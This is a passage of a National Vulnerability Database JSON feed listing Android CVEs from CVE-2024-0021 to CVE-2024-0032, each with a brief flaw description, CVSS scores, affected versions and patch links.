"CVE_data_meta" : { "ID" : "CVE-2024-0021", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/packages/apps/Settings/+/53ea491d276f9a7c586c7983c08105a9bb7051f1", "name" : "https://android.googlesource.com/platform/packages/apps/Settings/+/53ea491d276f9a7c586c7983c08105a9bb7051f1", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/packages/apps/Settings/+/53ea491d276f9a7c586c7983c08105a9bb7051f1", "name" : "https://android.googlesource.com/platform/packages/apps/Settings/+/53ea491d276f9a7c586c7983c08105a9bb7051f1", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-01-01", "name" : "https://source.android.com/security/bulletin/2024-01-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-01-01", "name" : "https://source.android.com/security/bulletin/2024-01-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In onCreate of NotificationAccessConfirmationActivity.java, there is a possible way for an app in the work profile to enable notification listener services due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-16T20:15Z", "lastModifiedDate" : "2024-12-16T18:55Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0022", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/bdf1cce569c9700965ff6baee8efd3fb1e8269e8", "name" : "https://android.googlesource.com/platform/frameworks/base/+/bdf1cce569c9700965ff6baee8efd3fb1e8269e8", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/bdf1cce569c9700965ff6baee8efd3fb1e8269e8", "name" : "https://android.googlesource.com/platform/frameworks/base/+/bdf1cce569c9700965ff6baee8efd3fb1e8269e8", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-04-01", "name" : "https://source.android.com/security/bulletin/2024-04-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-04-01", "name" : "https://source.android.com/security/bulletin/2024-04-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In multiple functions of CompanionDeviceManagerService.java, there is a possible launch NotificationAccessConfirmationActivity of another user profile due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-05-07T21:15Z", "lastModifiedDate" : "2025-03-27T21:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0023", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/av/+/30b1b34cfd5abfcfee759e7d13167d368ac6c268", "name" : "https://android.googlesource.com/platform/frameworks/av/+/30b1b34cfd5abfcfee759e7d13167d368ac6c268", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/av/+/30b1b34cfd5abfcfee759e7d13167d368ac6c268", "name" : "https://android.googlesource.com/platform/frameworks/av/+/30b1b34cfd5abfcfee759e7d13167d368ac6c268", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-01-01", "name" : "https://source.android.com/security/bulletin/2024-01-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-01-01", "name" : "https://source.android.com/security/bulletin/2024-01-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In ConvertRGBToPlanarYUV of Codec2BufferUtils.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-16T20:15Z", "lastModifiedDate" : "2024-12-16T18:52Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0024", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/6a9250ec7fc9801a883cedd7860076f42fb518ac", "name" : "https://android.googlesource.com/platform/frameworks/base/+/6a9250ec7fc9801a883cedd7860076f42fb518ac", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/6a9250ec7fc9801a883cedd7860076f42fb518ac", "name" : "https://android.googlesource.com/platform/frameworks/base/+/6a9250ec7fc9801a883cedd7860076f42fb518ac", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-05-01", "name" : "https://source.android.com/security/bulletin/2024-05-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-05-01", "name" : "https://source.android.com/security/bulletin/2024-05-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In multiple methods of UserManagerService.java, there is a possible failure to persist or enforce user restrictions due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-05-07T21:15Z", "lastModifiedDate" : "2024-12-17T16:48Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0025", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/d49662560e366dbf69bf7d59d00e73905d03e6d5", "name" : "https://android.googlesource.com/platform/frameworks/base/+/d49662560e366dbf69bf7d59d00e73905d03e6d5", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/d49662560e366dbf69bf7d59d00e73905d03e6d5", "name" : "https://android.googlesource.com/platform/frameworks/base/+/d49662560e366dbf69bf7d59d00e73905d03e6d5", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-05-01", "name" : "https://source.android.com/security/bulletin/2024-05-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-05-01", "name" : "https://source.android.com/security/bulletin/2024-05-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In sendIntentSender of ActivityManagerService.java, there is a possible background activity launch due to a logic error. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-05-07T21:15Z", "lastModifiedDate" : "2024-12-17T16:48Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0026", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-770" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/a8fb9fe93efdebc4145e00934f42c91742f328de", "name" : "https://android.googlesource.com/platform/frameworks/base/+/a8fb9fe93efdebc4145e00934f42c91742f328de", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/a8fb9fe93efdebc4145e00934f42c91742f328de", "name" : "https://android.googlesource.com/platform/frameworks/base/+/a8fb9fe93efdebc4145e00934f42c91742f328de", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-04-01", "name" : "https://source.android.com/security/bulletin/2024-04-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-04-01", "name" : "https://source.android.com/security/bulletin/2024-04-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In multiple functions of SnoozeHelper.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-05-07T21:15Z", "lastModifiedDate" : "2024-12-17T16:48Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0027", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-770" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/a8fb9fe93efdebc4145e00934f42c91742f328de", "name" : "https://android.googlesource.com/platform/frameworks/base/+/a8fb9fe93efdebc4145e00934f42c91742f328de", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/a8fb9fe93efdebc4145e00934f42c91742f328de", "name" : "https://android.googlesource.com/platform/frameworks/base/+/a8fb9fe93efdebc4145e00934f42c91742f328de", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-04-01", "name" : "https://source.android.com/security/bulletin/2024-04-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-04-01", "name" : "https://source.android.com/security/bulletin/2024-04-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In multiple functions of SnoozeHelper.java, there is a possible way to cause a boot loop due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-05-07T21:15Z", "lastModifiedDate" : "2024-12-17T16:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0029", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/9b10fd9718f4e6f6843adbfc14e46a93aab93aad", "name" : "https://android.googlesource.com/platform/frameworks/base/+/9b10fd9718f4e6f6843adbfc14e46a93aab93aad", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/9b10fd9718f4e6f6843adbfc14e46a93aab93aad", "name" : "https://android.googlesource.com/platform/frameworks/base/+/9b10fd9718f4e6f6843adbfc14e46a93aab93aad", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In multiple files, there is a possible way to capture the device screen when disallowed by device policy due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-16T02:15Z", "lastModifiedDate" : "2025-03-14T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0030", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-125" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/57b823f4f758e2ef530909da07552b5aa80c6a7d", "name" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/57b823f4f758e2ef530909da07552b5aa80c6a7d", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/57b823f4f758e2ef530909da07552b5aa80c6a7d", "name" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/57b823f4f758e2ef530909da07552b5aa80c6a7d", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In btif_to_bta_response of btif_gatt_util.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-16T02:15Z", "lastModifiedDate" : "2024-12-16T19:29Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0031", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/de53890aaca2ae08b3ee2d6e3fd25f702fdfa661", "name" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/de53890aaca2ae08b3ee2d6e3fd25f702fdfa661", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/de53890aaca2ae08b3ee2d6e3fd25f702fdfa661", "name" : "https://android.googlesource.com/platform/packages/modules/Bluetooth/+/de53890aaca2ae08b3ee2d6e3fd25f702fdfa661", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In attp_build_read_by_type_value_cmd of att_protocol.cc , there is a possible out of bounds write due to improper input validation. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-16T02:15Z", "lastModifiedDate" : "2024-12-16T19:30Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0032", "ASSIGNER" : "security@android.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://android.googlesource.com/platform/frameworks/base/+/4af5db76f25348849252e0b8a08f4a517ef842b7", "name" : "https://android.googlesource.com/platform/frameworks/base/+/4af5db76f25348849252e0b8a08f4a517ef842b7", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/frameworks/base/+/4af5db76f25348849252e0b8a08f4a517ef842b7", "name" : "https://android.googlesource.com/platform/frameworks/base/+/4af5db76f25348849252e0b8a08f4a517ef842b7", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/packages/providers/DownloadProvider/+/5acd646e0cf63e2c9c0862da7e03531ef0074394", "name" : "https://android.googlesource.com/platform/packages/providers/DownloadProvider/+/5acd646e0cf63e2c9c0862da7e03531ef0074394", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://android.googlesource.com/platform/packages/providers/DownloadProvider/+/5acd646e0cf63e2c9c0862da7e03531ef0074394", "name" : "https://android.googlesource.com/platform/packages/providers/DownloadProvider/+/5acd646e0cf63e2c9c0862da7e03531ef0074394", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] }, { "url" : "https://source.android.com/security/bulletin/2024-02-01", "name" : "https://source.android.com/security/bulletin/2024-02-01", "refsource" : "", "tags" : [ "Patch", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In queryChildDocuments of FileSystemProvider.java, there is a possible way to request access to directories that should be hidden due to improper input validation. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:google:android:12.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, 